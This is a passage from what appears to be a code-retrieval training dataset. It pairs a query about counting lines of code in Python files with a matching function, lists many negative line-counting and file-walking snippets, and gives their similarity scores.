src.decode(errors=\"ignore\")\n for line in src.splitlines():\n lineno += 1\n line = line.strip()\n m = RE_COMMENT.match(line)\n if m is not None:\n comment = m.group(2).strip()\n if comment == \"novermin\" or comment == \"novm\":\n # Ignore if it is inside another comment, like: `# test: # novm`\n if m.start(0) < m.start(1) and m.group(0).strip().startswith(\"#\"):\n continue\n # Associate with next line if the comment is \"alone\" on a line, i.e. '#' starts the line.\n novermin.add(lineno + 1 if m.start(1) == 0 else lineno)\n return novermin", "def num_bytes_per_line(self):\n return self._num_bytes_per_line", "def number_of_lines(filename=\"\"):\n count = 0\n with open(filename) as f:\n for lines in f:\n count += 1\n return (count)", "def number_of_lines(filename=\"\"):\n c = 0\n with open(filename) as f:\n for r in f:\n c += 1\n return(c)", "def countlines(fn):\n with open(fn, 'rb') as f:\n bufgen = takewhile(\n lambda x: x, (f.read(1024 * 1024) for _ in repeat(None)))\n ln = sum(buf.count(b'\\n') for buf in bufgen)\n return ln", "def get_table_nb_lines(self, table):\n sql = \"SELECT COUNT(*) FROM \" + table + \";\"\n cur = self._connection.cursor()\n cur.execute(sql)\n res = cur.fetchall()\n cur.close()\n return res[0][0]", "def test_counts(self):\n lines, words, chars = analyze_text(self.filename)\n self.assertEqual(lines, 4)\n self.assertEqual(words, 8)\n self.assertEqual(chars, 36)", "def count_lines(filename):\r\n with open(filename, 'rb') as f:\r\n return sum(1 for line in f)", "def get_file_line_count(a_file):\r\n count = -1\r\n try:\r\n for count, line in enumerate(open(a_file, \"rU\")):\r\n pass\r\n except IOError:\r\n pass\r\n count += 1\r\n return count", "def get_file_line_count(a_file):\r\n count = -1\r\n try:\r\n for count, line in enumerate(open(a_file, \"rU\")):\r\n pass\r\n except IOError:\r\n pass\r\n count += 1\r\n return count", "def num_lines(file_name):\n with open(file_name) as file:\n for i, line in enumerate(file):\n pass\n return i + 1", "def count_lines(stream):\n return len(stream.readlines())", "def data_len(self):\n Nrows_data = 0\n with self._compression_safe_file_opener(self.input_fname, \"r\") as f:\n for i, l in enumerate(f):\n if (l[0 : len(self.header_char)] != self.header_char) and (l != \"\\n\"):\n Nrows_data += 1\n return Nrows_data", "def count_comments(self):\n return self.run_query(f\"count({self.r}/comment)\")", "def retrieve_info():\n try:\n a = line_count()\n b = char_count()\n except:\n print(\"That didn't work, are you sure you defined a valid filename? Try using 'file <your filename>'\")\n return\n print(\"There are {0} lines in your file, for a total of {1} characters\".format(a,b))", "def count_lines(file_obj):\n for idx, line in enumerate(file_obj):\n pass\n file_obj.seek(0)\n return idx + 1", "def line_length(self, dLine = 0):\n return self.buffer.line_length(self.line + dLine)", "def count_LOC(path):\n re_empty = re.compile(r\"[\\s]*(#|\\n|\\\"\\\"\\\")\")\n re_for = re.compile(r\"for.*in\")\n re_lambda = re.compile(r\"lambda\")\n re_if = re.compile(r\"if.*:\")\n re_def = re.compile(r\"def (?P<fname>\\w+)\\(\")\n\n total_LOC, indent_level = 0, 0\n cur_part = None\n parts = defaultdict(int)\n\n with open(path, 'r') as _file:\n for line in filter(lambda l : not re_empty.match(l), _file):\n\n extra = len( re_for.findall(line) ) - 1 + len( re_lambda.findall(line) ) - 1 + len( re_if.findall(line) ) -1\n\n if extra < 0: extra = 0\n\n total_LOC += 1 + extra\n if cur_part:\n parts[cur_part] += 1 + extra\n\n defs = re_def.search(line)\n if defs:\n cur_part = defs.groupdict()['fname']\n indent_level = first_non_whitespace(line)\n\n cur_indent = first_non_whitespace(line)\n if cur_indent < indent_level:\n cur_part = None\n indent_level = cur_indent\n\n return(total_LOC, parts)", "def contentcheck_numerical():\n filename = \"Analysis.txt\"\n temp_line = \"\"\n count = 0\n for line in open(filename, 'r'):\n temp_line = temp_line + line\n if \"DATA INFORMATION\" in temp_line:\n count = count + 1\n if \"MEAN, MEDIAN AND MODE:\" in temp_line:\n count = count + 1\n if \"Correlation\" in temp_line:\n count = count + 1\n if \"Normality Tests\" in temp_line:\n count = count + 1\n return count", "def count_lines(filename):\n with open(filename, 'rb') as f:\n return sum(1 for line in f)", "def len(self, table):\n return self.get_table_nb_lines(table)", "def checkEachLineCount(mat):\n n = sum(mat[0])\n \n assert all(sum(line) == n for line in mat[1:]), \"Line count != %d (n value).\" % n\n return n", "def number_of_lines(filename=\"\"):\n with open(filename, encoding=\"utf-8\") as file:\n text = file.readlines()\n return len(text)", "def checkEachLineCount(mat):\n n = sum(mat[0])\n\n assert all(sum(line) == n for line in mat[1:]), \"Line count != %d (n value).\" % n\n return n", "def number_of_lines(filename=\"\"):\n with open(filename, encoding='UTF8') as a_file:\n\n lineNum = 0\n\n for eachLine in a_file:\n lineNum += 1\n return lineNum", "def file_len(full_path):\n f = open(full_path)\n nr_of_lines = sum(1 for line in f)\n f.close()\n return nr_of_lines", "def number_of_lines(filename=\"\"):\n n = 0\n if filename == \"\":\n return n\n with open(filename, \"r\") as f:\n for line in f:\n n = n + 1\n return n", "def N_POINTS(self) -> int:\n try:\n with self.fs.open(\n self.get_url().replace(\".\" + self.erddap.response, \".ncHeader\")\n ) as of:\n ncHeader = of.read().decode(\"utf-8\")\n lines = [line for line in ncHeader.splitlines() if \"row = \" in line][0]\n return int(lines.split(\"=\")[1].split(\";\")[0])\n except Exception:\n pass", "def _chunklines(self):\r\n text = self.textwnd.toPlainText()\r\n lines_in_chunk = len(text.split(\"\\n\"))\r\n logger.debug(\"Lines in chunk: {}\".format(lines_in_chunk))\r\n return lines_in_chunk", "def numLinesInFile(fname):\n with open(fname, 'rb') as f:\n for i, l in enumerate(f):\n pass\n return i + 1", "def count_total_line():\n count = 0\n file_count = 0\n for filename in os.listdir('.'):\n if filename.endswith(\".json\"):\n file_count += 1\n with open(filename, 'r', encoding='utf8') as f:\n for line in f:\n count += 1\n print(\"There are {0} lines in {1} json files\".format(count, file_count))", "def count_len(self):\n total = 0\n for filename in self.filenames:\n f = open(os.path.join(self.directory, filename))\n line_count = 0\n for _ in f:\n line_count += 1\n if line_count < self.window_size:\n continue\n else:\n total += line_count - self.window_size + 1\n return total", "def number_of_lines(filename=\"\"):\n n_lines = 0\n with open(filename, encoding='utf-8', mode='r') as file:\n for lines in file:\n n_lines += 1\n return n_lines", "def number_of_lines(filename=\"\"):\n counter = 0\n with open(filename, \"r\") as my_file:\n for line in my_file:\n counter += 1\n my_file.close()\n return (counter)", "def test_makefile_total_lines(cookies, context, black, pipenv, mypy):\n ctx = context(black=black, pipenv=pipenv, mypy=mypy)\n result = cookies.bake(extra_context=ctx)\n\n makefile = result.project.join('Makefile')\n lines = makefile.readlines(cr=False)\n\n expected = 27\n expected -= 2 if black == 'n' else 0\n expected -= 1 if mypy == 'do not use' else 0\n assert len(lines) == expected", "def number_of_lines(filename=\"\"):\n\n number_lines = 0\n with open(filename) as file_opened:\n for line in file_opened:\n number_lines += 1\n return number_lines", "def paragraph_count(self, doc):\n\n paragraphs = doc.split(\"\\n\\n\")\n # remove the empty string\n return len([paragraph for paragraph in paragraphs if paragraph])", "def get_number_of_paragraph(self):\n file_to_read = f'{self.path}/{self.filename}'\n file = open(file_to_read, 'r', encoding='utf-8')\n string_to_match = '<p>'\n count = 0\n for line in file:\n if string_to_match in line:\n count += 1\n sqlite_for_ht.CreateTable.update_table(f_1, self.filename, 'number_of_paragraph', count)\n print(datetime.now(), '-', 'number_of_paragraph for', self.filename, 'calculated =', count)\n return None", "def number_of_lines(filename=\"\"):\n with open(filename, encoding='utf-8') as myFile:\n return sum([1 for line in myFile])", "def gather_counts(directory):\n counts_un = defaultdict(int)\n counts_bi = defaultdict(int)\n counts_tri = defaultdict(int)\n prev_prev = \"<s>\"\n prev = \"<s>\"\n for filename in os.listdir(f\"./{directory}\"):\n if \".DS_Store\" in filename:\n continue\n with open(f\"./{directory}/{filename}\", \"r\") as f:\n for line in f:\n line = line.strip()\n if len(line) == 0:\n continue\n counts_un[line+\"\\n\"] += 1\n counts_bi[prev+\"\\n\"+line+\"\\n\"] += 1\n counts_tri[prev_prev+\"\\n\"+prev+\"\\n\"+line+\"\\n\"] += 1\n prev_prev = prev\n prev = line\n counts_un[\"</s>\\n\"] += 2\n counts_bi[\"</s>\\n</s>\\n\"] += 1\n counts_bi[prev+\"\\n\"+\"</s>\\n\"] += 1\n counts_tri[prev_prev+\"\\n\"+prev+\"\\n\" + \"</s>\\n\"] += 1\n counts_tri[prev+\"\\n</s>\\n</s>\\n\"] += 1\n return counts_un, counts_bi, counts_tri", "def count_lines(inFile, outFile):\n \n bodyLines = []\n # Begin iteratin lines, starting at line 'lineNum'\n for line_ in inFile:\n line_ = line_.rstrip('\\n').strip()\n if (not line_) or (line_[0] == '!'):\n continue\n elif line_.upper() in cases:\n print(\"Error: encountered new case before end of last.\"\n \"\\n Have you forgotten an 'END'?\", file=outFile)\n sys.exit()\n elif line_.upper() == \"END\":\n return bodyLines\n else:\n bodyLines.append(line_)", "def total_rows(self):\n self._fetch_if_needed()\n # reduce case, count number of lines\n if self._total_rows is None:\n return self.count()\n return self._total_rows", "def num_lines(fname):\n with open(fname) as f:\n for i, l in enumerate(f):\n pass\n return( i + 1 )", "def num_items(self):\n num_items = 0\n for line in self.lines.all():\n num_items += line.quantity\n return num_items", "def get_line_no(obj):\n try:\n lineno = getsourcelines(obj)[1]\n except:\n # no code found\n lineno = None\n return lineno", "def number_of_lines(filename=\"\"):\n line_number = 0\n with open(filename, encoding='UTF8') as f:\n for line in f:\n line_number += 1\n return line_number", "def parseCommentsTotalCount(data):\n p = re.compile(r\"\\d+ Reviews\")\n\n for line in data:\n line = line.replace(\",\", \"\")\n match = re.search(p, line)\n if match != None:\n getNmbr = match.group().split(\" \")\n return int(getNmbr[0])\n return -1", "def count_locs(file_type, comment_pattern):\n find = \"find . -name '*.{0}' -print0\".format(file_type)\n sed_pattern = \"'/^\\s*{0}/d;/^\\s*$/d'\".format(comment_pattern)\n\n cmd = \"{0} | xargs -0 sed {1} | wc -l\".format(find, sed_pattern)\n\n return check_output(cmd, shell = True).decode('utf-8').replace('\\n', '')", "def coverage_stats(self) -> (int, int):\n covered = sum(1 for line in self.source_code if line.coverage > 0)\n lines = sum(1 for line in self.source_code if line.coverage >= 0)\n return (covered, lines)", "def count_tests(infile):\n\n ntests = 0\n with open(infile, \"r\") as ff:\n for line in ff:\n if line.strip(): # Jump empty lines\n if summary in line:\n # Count failed tests for each start of file\n ntests += 1\n return ntests", "def estimate_lines(self):\r\n logger.debug(\"estimate Lines\")\r\n self.filesize = Path(self.fileName).stat().st_size\r\n text = self.textwnd.toPlainText()\r\n linetext = text.split(\"\\n\")[1] + \"\\\\r\\\\n\"\r\n self.linesize = len(linetext.encode('utf-8'))\r\n self.estimated_lines = self.filesize // self.linesize\r\n logger.debug(\"Estimate Lines: {}\".format(self.estimated_lines))\r\n self.statusBar.showMessage(f\"Estimated lines: {self.estimated_lines}\")", "def ignore_newline(self, t):\n self.lineno += t.value.count('\\n')", "def bufcount(filename):\n\timport gzip\n\tif filename.split('.')[-1] in ['gz','gzip']: f = gzip.open(filename)\n\telse: f = open(filename)\n\tlines = 0\n\tbuf_size = 1024 * 1024\n\tread_f = f.read # loop optimization\n\t\n\tbuf = read_f(buf_size)\n\twhile buf:\n\t\tlines += buf.count('\\n')\n\t\tbuf = read_f(buf_size)\n\t\tf.close\n\treturn lines", "def extract_docstring_linenum(node: ast.Str) -> int:\n doc = node.s\n lineno = node.lineno\n if _string_lineno_is_end:\n # In older CPython versions, the AST only tells us the end line\n # number and we must approximate the start line number.\n # This approximation is correct if the docstring does not contain\n # explicit newlines ('\\n') or joined lines ('\\' at end of line).\n lineno -= doc.count('\\n')\n\n # Leading blank lines are stripped by cleandoc(), so we must\n # return the line number of the first non-blank line.\n for ch in doc:\n if ch == '\\n':\n lineno += 1\n elif not ch.isspace():\n break\n \n return lineno", "def get_n_lines(file):\n return sum(1 for _ in open(file))", "def line(self) -> int:", "def count_lines(filename):\n with open(filename, 'r', encoding='utf-8') as file:\n lines_count = int()\n for line in file:\n lines_count += 1\n info_tuple = (filename, lines_count)\n return info_tuple", "def getNumRows(self) -> int:\n ...", "def indentsize(line):\r\n expline = string.expandtabs(line)\r\n return len(expline) - len(string.lstrip(expline))", "def count_indents(text):\n counts = 0\n for char in text:\n if char.isspace() and char != \"\\t\" and char !=\"\\n\":\n counts += 1\n elif char.isalpha():\n break\n return counts", "def totallines(self):\n return self._totallines", "def peek_length(self) -> Optional[int]:\n LINE_CUTOFF = 10_000\n count = 0\n with open(self.path, mode='r') as f:\n for _ in f:\n count += 1\n\n return count", "def analyzePythonCode(self, sourceFile):\n numLines = 0 # Number of lines of code\n numDocStr = 0 # Number of doc strings in code\n numComments = 0 # Number of comments in the code\n numDefs = 0 # Number of functions\n numClasses = 0 # Number of classes\n f=self.openFile(sourceFile)\n for line in f:\n numLines += 1;\n loc = 0\n while (loc != -1): #count the # of times the '#' characters appears\n loc = line.find(\"#\", loc)\n if (loc != -1):\n loc += 1\n numComments += 1\n loc = 0\n while (loc != -1):\n loc = line.find('\"#', loc) #discount the # of times the '#' char appears as the 1st char in double quotes (skip hex constants)\n if (loc != -1):\n loc += 1\n numComments -= 1\n loc = 0\n while (loc != -1):\n loc = line.find(\"'#\", loc) #discount the # of times the '#' char appears as the 1st char in single quotes (skip hex constants)\n if (loc != -1):\n loc += 1\n numComments -= 1\n loc = 0\n while (loc != -1): #count the # of ''' found\n loc = line.find(\"'''\", loc)\n if (loc != -1):\n loc += 1\n numDocStr += 1\n loc = 0\n while (loc != -1): #count the # of \"\"\" found\n loc = line.find('\"\"\"', loc)\n if (loc != -1):\n loc += 1\n numDocStr += 1\n\n if line.strip(AutoGrader.Const.PYTHON_WHITE_SPACES) != '':\n if line.strip(AutoGrader.Const.PYTHON_WHITE_SPACES).split()[0] == 'def': #count # of defs\n numDefs += 1\n if line.strip(AutoGrader.Const.PYTHON_WHITE_SPACES).split()[0] == 'class': #count # of classes\n numClasses += 1\n \n f.close()\n numDocStr /= 2 #assume that the \"\"\" and ''' chars appear in pairs \n return numLines, numDocStr, numComments, numDefs, numClasses", "def num_lineages(self, t):\n return self._ll_tree.get_num_lineages(t)", "def calc_lines(self):\n line = []\n for msg in self.message_log:\n msg = msg['msg']\n if '\\n' not in msg:\n line.append(math.ceil((len(msg) + 18) / self.w))\n else:\n msg = msg.split('\\n')\n total = 0\n for i in msg:\n total += math.ceil((len(i) + 18) / self.w)\n line.append(total)\n return line", "def find_line_offsets(self):\n # line 0 doesn't exist; line 1 starts at char offset 0.\n self.line_offsets = [None, 0]\n # Find all newlines in `text`, and add an entry to\n # line_offsets for each one.\n pos = self.text.find('\\n')\n while pos != -1:\n self.line_offsets.append(pos+1)\n pos = self.text.find('\\n', pos+1)\n # Add a final entry, marking the end of the string.\n self.line_offsets.append(len(self.text))" ]
[ "0.7124473", "0.7070284", "0.7070284", "0.70378745", "0.68012744", "0.6775583", "0.6723244", "0.66507286", "0.6617019", "0.6589754", "0.6558442", "0.64918953", "0.6448747", "0.6290716", "0.6276412", "0.62674546", "0.62459767", "0.6210425", "0.61959755", "0.61630034", "0.607485", "0.60718256", "0.60165143", "0.60162073", "0.60037184", "0.59883296", "0.5987761", "0.59413785", "0.5936182", "0.59178585", "0.5916363", "0.5916251", "0.59111917", "0.58982295", "0.5852242", "0.5851282", "0.58498377", "0.5844391", "0.5810414", "0.58063877", "0.57984734", "0.57945955", "0.5792947", "0.5784022", "0.5784022", "0.5773813", "0.5773533", "0.5770539", "0.5755285", "0.57249373", "0.5718683", "0.57129776", "0.5712446", "0.57076025", "0.570337", "0.5699872", "0.569652", "0.569636", "0.5692555", "0.56902367", "0.568061", "0.56565064", "0.5653833", "0.5632383", "0.56285274", "0.5625233", "0.5623037", "0.56146735", "0.56099117", "0.5609803", "0.5602524", "0.55954427", "0.5585437", "0.5577345", "0.5570784", "0.55703294", "0.55693257", "0.556186", "0.55543566", "0.55497676", "0.5544582", "0.5542266", "0.5537529", "0.55228424", "0.5513554", "0.55054975", "0.5502461", "0.5500896", "0.5490819", "0.54755926", "0.54749256", "0.54647994", "0.54591167", "0.54552305", "0.5451477", "0.54513496", "0.5449478", "0.5444156", "0.54259574", "0.54147977", "0.54108155" ]
0.0
-1
Returns the total, nonblank and net loc for all the python files in a directory
def get_folder_total(path): files = os.listdir(path) pythonfiles = ['%s/%s' % (path, filename) for filename in files if filename[-3:] == '.py'] total = { 'net': 0, 'total': 0, 'nonblank': 0, 'num_inputs':0 } for filename in pythonfiles: with open(filename, 'r') as thisfile: blob = thisfile.read() # print filename thisloc = loc(blob) for k, v in thisloc.items(): total[k] += v return total
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def loc():\n file_types = (\n ['Python', 'py', '#']\n )\n\n click.echo('Lines of code\\n-------------')\n\n click.echo(\"{0}: {1}\".format(file_types[0], count_locs(file_types[1],\n file_types[2])))\n\n return None", "def analyze_files(self):\n for file in os.listdir(self.directory):\n if file[-3:] == (\".py\"):\n fopen = open(os.path.join(self.directory, file), \"r\")\n try:\n if not (py_file := fopen):\n raise FileNotFoundError\n\n with py_file: # close file after opening\n class_count: int = 0\n fun_count: int = 0\n l_count: int = 0\n ch_count: int = 0\n for line in py_file: # calculate values for the file\n if line.strip().startswith(\"class \"):\n class_count = class_count+1\n elif line.strip().startswith(\"def \"):\n fun_count = fun_count+1\n\n l_count = l_count+1\n ch_count = ch_count+len(line)\n\n self.files_summary[str(os.path.join(self.directory, file))] = {\"class\": class_count, \"function\": fun_count, \"line\": l_count,\n \"char\": ch_count}\n except FileNotFoundError:\n print(f\"File {py_file} is not found or can not be opened\")\n fopen.close()", "def checkSum():\n val = 0\n for ext in EXTENSION_GLOBS:\n for f in glob.glob (ext):\n stats = os.stat(f)\n val += stats[stat.ST_SIZE] + stats[stat.ST_MTIME]\n return val", "def fileCounter(directory):", "def getFileLoc(self):\n\t\trval = []\n\t\tlocalVolTbl = self.file_loc['localVolTbl']\n\t\tnetVolTbl = self.file_loc['netVolTbl']\n\t\t\n\t\tif localVolTbl != None:\n\t\t\trval.extend((FILE_LOC[0],\n\t\t\t\tFILE_LOC[1] + self.file_loc['basePathname'] + \\\n\t\t\t\t\"\\\\\" + self.file_loc['remainPathname']))\n\t\n\t\t\tfor ii in range(len(VOL_TYPE)):\n\t\t\t\tif (self.header['file_attributes'] & (2 ** (ii + 1))) > 0:\n\t\t\t\t\trval.append(VOL_TYPE[ii])\n\t\t\t\t\n\t\t\trval.extend((FILE_LOC[2] + localVolTbl['volume_label'],\n\t\t\t\tFILE_LOC[3] + str(localVolTbl['vol_serial_num'])))\t\t\n\t\n\t\tif netVolTbl != None:\n\t\t\trval.append(FILE_LOC[4] + netVolTbl['net_sharename'] + \\\n\t\t\t\t\"\\\\\" + self.file_loc['remainPathname'])\n\t\treturn rval", "def check_dir(self):\n if not Path(self.src_dir).exists():\n print('No such directory found:', self.src_dir)\n return\n\n nc_all = self.src_dir + \"/*.nc*\"\n if len(glob.glob(nc_all)) == 0:\n print('No NetCDF files found in:', self.src_dir)\n return\n\n return nc_all", "def analyze_files(self):\n num_file = 0\n results = dict()\n try:\n list_files = os.listdir(self.directory)\n except FileNotFoundError:\n raise FileNotFoundError(\"Can't find any file\")\n else:\n for file in list_files: #looping the files in the directly\n num_file += 1\n if file.endswith(\".py\"): # Looking for files that end with .py\n try:\n fp = open(os.path.join(self.directory, file), \"r\")\n except FileNotFoundError:\n raise FileNotFoundError(f\"Can't open file no {num_file}\")\n else:\n with fp:\n c_total = 0 #Total length of Characters for the entire file\n filename = file # Storing the file name\n t_line = 0 # Getting the total number of line\n t_def = 0 #Getting the total number of functions\n t_class = 0 #Getting the total number of classes\n \n for line in fp:\n t_line += 1 # Counting each line\n t_char = len(line) #Length of characters for each line\n n_line = line.strip() # gets rid of white spaces and new lines\n c_total += t_char # adding each total char in line to the pervious total char in line\n if n_line.startswith(\"def \"): \n t_def += 1 \n elif n_line.startswith(\"class \"):\n t_class += 1\n results[filename] = {'class': t_class, 'function': t_def, 'line': t_line, 'char': c_total }\n return results", "def test_case_6():\n print(\"*********Test_case_6***********\")\n path = os.path.join(os.path.dirname(__file__), 'testdir', 't1.c')\n result = find_files('.c', path)\n print(result)", "def test_case_5():\n print(\"*********Test_case_5***********\")\n result = find_files('.c', \"\")\n print(result)", "def execute(root_dir):\n \n \n #Getting all the file recursively that py files\n lenght=[]\n libraries=[]\n nesting_factors=[]\n param_count=[]\n total_var=[]\n duplicate_for_the_repo=[]\n average_nesting_factor=0\n average_param=0\n code_duplication=0\n avg_var=0\n \n k=root_dir.rsplit('-')\n n=k[0]\n m=k[-1]\n \n urls=[ repo for repo in repo_list if n and m in repo ]\n if urls:\n url=urls[0]\n else:\n url=root_dir\n\n for filename in glob.iglob(root_dir + '/**/*.py', recursive=True):\n #filename=filename.replace(\" \", \"\\\\ \")\n filename=str_to_raw(filename)\n try: \n count=pygount.source_analysis(filename, 'pygount') # counting the line of codes for the py files\n l=count.code\n lenght.append(l)\n library =imported_module(filename)\n for lib in library:\n libraries.append(lib)\n deg_list=nesting_factor(for_loop_position(filename)) \n for deg in deg_list:\n nesting_factors.append(deg)\n\n\n\n for param in parameter_count(filename):\n param_count.append(param)\n for var in variable_count(filename):\n total_var.append(var)\n duplicate_for_the_repo.append(duplicated_line(filename))\n except Exception as e:\n print(\"type error: \" + str(e))\n print(filename)\n \n \n if len(nesting_factors) !=0: \n average_nesting_factor= np.mean(nesting_factors)\n if param_count: \n average_param= np.mean(param_count) \n libraries=unique(libraries)\n repo_count=sum(lenght)\n if total_var:\n avg_var=np.mean(total_var)\n if repo_count and duplicate_for_the_repo:\n code_duplication=(sum(duplicate_for_the_repo)/repo_count)*100\n \n return {'repository_url': url, \n 'number of lines': repo_count, \n 'libraries': libraries,\n 'nesting factor': average_nesting_factor,\n 'code duplication': code_duplication,\n 'average parameters':average_param,\n 'average variables':avg_var}", "def _get_run_info(self, path, creation_date):\n total = 0\n try:\n for entry in os.scandir(path):\n # Only evaluates size of files and not folders inside raw/proc\n if entry.is_file():\n # if it's a file, use stat() function\n total += entry.stat().st_size\n\n except NotADirectoryError:\n # if `path` isn't a directory, get the file size then\n total = os.path.getsize(path)\n except PermissionError:\n # if for whatever reason we can't open the folder, return 0\n return 0\n\n if os.path.isdir(path):\n validator = RunValidator(path)\n elif path.endswith(\".h5\"):\n validator = FileValidator(H5File(path).files[0])\n else:\n return 0\n\n try:\n validator.run_checks()\n except Exception:\n pass\n return total, str(ValidationError(validator.problems))", "def test_case_3():\n print(\"*********Test_case_3***********\")\n result = find_files('.c', None)\n print(result)", "def count_LOC(path):\n re_empty = re.compile(r\"[\\s]*(#|\\n|\\\"\\\"\\\")\")\n re_for = re.compile(r\"for.*in\")\n re_lambda = re.compile(r\"lambda\")\n re_if = re.compile(r\"if.*:\")\n re_def = re.compile(r\"def (?P<fname>\\w+)\\(\")\n\n total_LOC, indent_level = 0, 0\n cur_part = None\n parts = defaultdict(int)\n\n with open(path, 'r') as _file:\n for line in filter(lambda l : not re_empty.match(l), _file):\n\n extra = len( re_for.findall(line) ) - 1 + len( re_lambda.findall(line) ) - 1 + len( re_if.findall(line) ) -1\n\n if extra < 0: extra = 0\n\n total_LOC += 1 + extra\n if cur_part:\n parts[cur_part] += 1 + extra\n\n defs = re_def.search(line)\n if defs:\n cur_part = defs.groupdict()['fname']\n indent_level = first_non_whitespace(line)\n\n cur_indent = first_non_whitespace(line)\n if cur_indent < indent_level:\n cur_part = None\n indent_level = cur_indent\n\n return(total_LOC, parts)", "def getBaseSrcFile(self) -> List[int]:\n ...", "def checkSumHelper(arg, dirname, fnames):\n val = 0\n files = [name for name in fnames if os.path.splitext(name)[1] in EXTENSIONS]\n for file in files:\n absFile = os.path.join(dirname,file)\n try:\n stats = os.stat(absFile)\n except OSError,e:\n # This is to skip over temporary files or files\n # nosy doesn't have permission to access\n # print \"Nosy: skipping file %s with error %s\"%(absFile,e)\n continue\n val += stats[stat.ST_SIZE] + stats[stat.ST_MTIME]\n arg.append(val)\n return", "def test_case_1():\n print(\"*********Test_case_1***********\")\n path = os.path.join(os.path.dirname(__file__), 'testdir')\n result = find_files('.c', path)\n for file in result:\n print(file)", "def test_case_4():\n print(\"*********Test_case_4***********\")\n path = os.path.join(os.path.dirname(__file__), 'testdir')\n result = find_files('', path)\n for file in result:\n print(file)", "def print_local_output_files_stats():\n print \"\\n\\nFILES CREATED:\"\n for filename in os.listdir('../output'):\n filesize = os.path.getsize('../output/' + filename)\n print str(filesize) + \"\\t\" + filename\n print \"\\n\"", "def get_amount_of_data(directory: str):\n size = sum([os.path.getsize(os.path.join(directory, item)) for item in os.listdir(directory) if os.path.isfile(os.path.join(directory, item))])\n print(size)\n return size", "def readfiles(self, dirname , search , notsearch = 'rgvar' , notdir = 'xyvwa'):\n print('We are in the following directory: %s looking for files that contain %s and not %s' %(dirname, search , notsearch))\n dirlist = os.listdir(dirname)\n for filep in dirlist:\n filep = os.path.join(dirname,filep) \n if os.path.islink(filep):\n pass\n elif os.path.isdir(filep):\n m = re.search(notdir , filep)\n if m is None:\n self.readfiles(filep , search, notsearch = notsearch, notdir = notdir )\n elif os.path.isfile(filep) and '.dat' in filep: \n nm = re.search(notsearch, filep)\n m = re.search(search , filep)\n #print m , nm\n if m is not None and nm is None:\n self.plotfiles.append(filep)\n else:\n pass", "def my_root_listdir(root_dir):\n root_listdir = [\n images_dir\n for images_dir in os.listdir(root_dir)\n if not any(\n characters in images_dir for characters in [\".\", \"test\", \"train\", \"valid\"]\n )\n ]\n summ = 0\n for images_dir in root_listdir:\n summ += len(os.listdir(root_dir + \"/\" + images_dir)) / 2 - 2\n print(\"Sum of images in directories: \", int(summ))\n return root_listdir", "def retrive_scanning_scheme(self, Nest_data_directory, file_keyword = 'PMT_0Zmax'):\r\n fileNameList = []\r\n# ImgSequenceNum = 0\r\n for file in os.listdir(Nest_data_directory):\r\n if file_keyword in file:\r\n fileNameList.append(file)\r\n \r\n RoundNumberList = []\r\n CoordinatesList = []\r\n for eachfilename in fileNameList:\r\n # Get how many rounds are there\r\n try:\r\n RoundNumberList.append(eachfilename[eachfilename.index('Round'):eachfilename.index('_Grid')])\r\n except:\r\n RoundNumberList.append(eachfilename[eachfilename.index('Round'):eachfilename.index('_Coord')])\r\n \r\n RoundNumberList = list(dict.fromkeys(RoundNumberList)) # Remove Duplicates\r\n \r\n CoordinatesList.append(eachfilename[eachfilename.index('Coord'):eachfilename.index('_PMT')])\r\n CoordinatesList = list(dict.fromkeys(CoordinatesList))\r\n \r\n# print(RoundNumberList, CoordinatesList, fileNameList)\r\n return RoundNumberList, CoordinatesList, fileNameList", "def add_loc(self):\n self.loc = 0\n for t in self.thys:\n with open(t, 'r') as f:\n for l in f:\n if l.strip():\n self.loc += 1", "def process_files(file_location, day):\n # construct file path\n file_dir = PREFIX+file_location\n file_pattern = file_dir+'lz_'+day+'*_raw.root'\n # print(file_pattern)\n file_list = glob.glob(file_pattern)\n print(\"There are %s MC files in the requested directory (%s).\" %(len(file_list), file_dir))\n file_names = []\n for f in file_list:\n file_name_only = f.split('/')\n file_names.append(file_name_only[-1])\n return file_names", "def scan(self,project_dir):\n ftypes = [\".csv\", \".data\", \".xlsx\"]\n print(\"Scanning directory : \",project_dir)\n print(\"Searching for : \",ftypes)\n self.localfiles = {}\n for dirpath, dirnames, filenames in os.walk(project_dir, topdown=True):\n for filename in filenames:\n for ftype in ftypes:\n if ftype in filename:\n self.localfiles[filename] = {\n \"filename\": filename,\n \"filesize\": getsize(os.path.join(dirpath, filename)),\n \"abspath\": os.path.join(dirpath, filename),\n \"dirpath\": dirpath,\n \n }\n print(\"Found These: \",[file_name for file_name in self.localfiles.keys()])", "def getFilePaths():\n \n image_dir = r'/hpc/wfok007/mpi_heart/Training Set'\n mask_paths = []\n image_paths = []\n for root, dirs, files in os.walk(image_dir, topdown=False):\n for name in files:\n if name == 'laendo.nrrd':\n mask_paths.append(os.path.join(root, name))\n elif name == 'lgemri.nrrd':\n image_paths.append(os.path.join(root, name))\n else:\n print ('%s is unknown' %name)\n return mask_paths, image_paths", "def total_files(self):\n command = \"SELECT searched FROM options;\"\n return self.c.execute(command)", "def get_checkpoint():\n\timport numpy as np\n\n\tcheckpoint = []\n\tfor directory in directories:\n\t\ttry: # try to find folder\n\t\t\tos.chdir('./'+directory)\n\t\texcept:\n\t\t\tcontinue\n\t\tcontents = os.listdir('./')\n\t\tif contents == []: # if folder is empty\n\t\t\tprint(\"No data for\", directory)\n\t\t\tos.chdir('..')\n\t\t\tcontinue\n\t\tcounter = []\n\t\tfor entry in contents:\n\t\t\tentry = entry.split('.')\n\t\t\tnum = entry[0][2:]\n\t\t\ttry: # excludes files that aren't of type x-y.jpg\n\t\t\t\tnum = int(num)\n\t\t\t\tcounter.append(num)\n\t\t\texcept:\n\t\t\t\tcontinue\n\t\tcheckpoint.append(max(counter))\n\t\tos.chdir('..')\n\tcheckpoint = np.mean(checkpoint)\n\treturn checkpoint", "def target_totalfiles(self):\n return self._cfg.get('totalfiles', None)", "def test_case_2():\n print(\"*********Test_case_2***********\")\n path = os.path.join(os.path.dirname(__file__), 'testdir')\n result = find_files(None, path)\n print(result)", "def scanFiles(directory, includes = [\"*\"], excludes = []):\n\treturn scanAll(directory, includes, excludes)[1]", "def fs_files_total(self):\n return self._fs_files_total", "def test_search_file(self):\n base_dir = join(get_current_path(), 'samples', 'base_dir1')\n output_dir = join(get_current_path(), 'samples', 'base_dir1', 'result')\n files = search_files(base_dir, output_dir)\n self.assertTrue(self.verify_sub_folders(list(files.keys())))\n\n # sub folders under Concord is not counted, only files\n self.assertEqual(len(files['Concord']), 5)\n self.assertEqual(len(files['ListCo Equity']), 1)\n 